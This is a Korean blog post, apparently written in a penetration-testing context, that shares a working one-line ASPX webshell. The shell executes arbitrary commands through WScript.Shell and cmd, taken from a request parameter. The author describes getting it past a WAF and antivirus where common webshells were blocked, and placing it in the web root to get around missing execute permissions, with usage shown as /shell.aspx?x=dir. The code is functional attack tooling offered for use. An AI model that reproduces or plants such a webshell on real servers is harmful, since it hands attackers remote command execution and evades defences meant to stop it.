| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 | 31 |
Tags
- 로맨스스캠
- 네이버카페
- XSS
- MongoDB #NoSQL #CreateUser #DropUser #mongod #mognod.conf
- shell_gpt
- 거래사기
- react
- 허리디스크
- Frida
- 변태는
- 보이스피싱 #대검찰청 #명의도용 #비밀번호 #계좌번호 #공공기관 #가짜검찰청
- NUGU
- CJ대한통운 #쿠팡 #통관번호오류 #통관고유번호오류 #안주원팀장 #모건인베스트
- 많다..
- open redirect
- 모의해킹
- self-signed
- speed-measure-webpack-plugin
- esbuild
- Malware Sample
- 채팅환전사기
- CryptoJS
- 중고나라
- 사진도용
- 취약점
- sha256
- 안전결제
- 척추관협착증
- ssrf
- ue4dumper
Archives
- Today
- Total
annyoung
aspx one line webshell 본문
<%
Response.write(CreateObject("WScript.Shell").Exec("cmd /c " + request("x")).StdOut.Readall())
%>
대중적으로 사용되는 웹쉘들이 업로드가 아예 안됐는데 앞단에 WAF가 존재했고, IIS 서버에서는 안랩 랜섬웨어 관련 백신이 돌고 있었다. 안올라가는 이유를 모르겠으나.. ModSecurity가 돌고 있는것 같기도하고.. 확실하진 않다.
Set, Let과 같은 지시어를 사용해 변수 선언이 아예 불가능해서 하나 하나 테스트하면서 결국 찾았다..
Upload 되는 디렉토리에서는 실행 권한이 빠져있는 것 같아서 최상위 디렉토리로 올려서 실행했다.
아무튼 사용 방법은 /shell.aspx?x=dir로 사용하면 된다.
'모의해킹' 카테고리의 다른 글
| Unreal Engine 4.27.2 dump with split apk (48) | 2024.07.25 |
|---|---|
| Frida UnrealEngine 4.27.2 후킹 (0) | 2024.07.23 |
| 맥 네트워크 프록시 명령어로 껐다 켰다하기 (0) | 2024.05.23 |
| pdf generator SSRF (2) | 2023.11.28 |
| 클라이언트 프레임워크 디버깅 쉽게하기 (2) | 2023.11.21 |
'모의해킹' Related Articles
more
Comments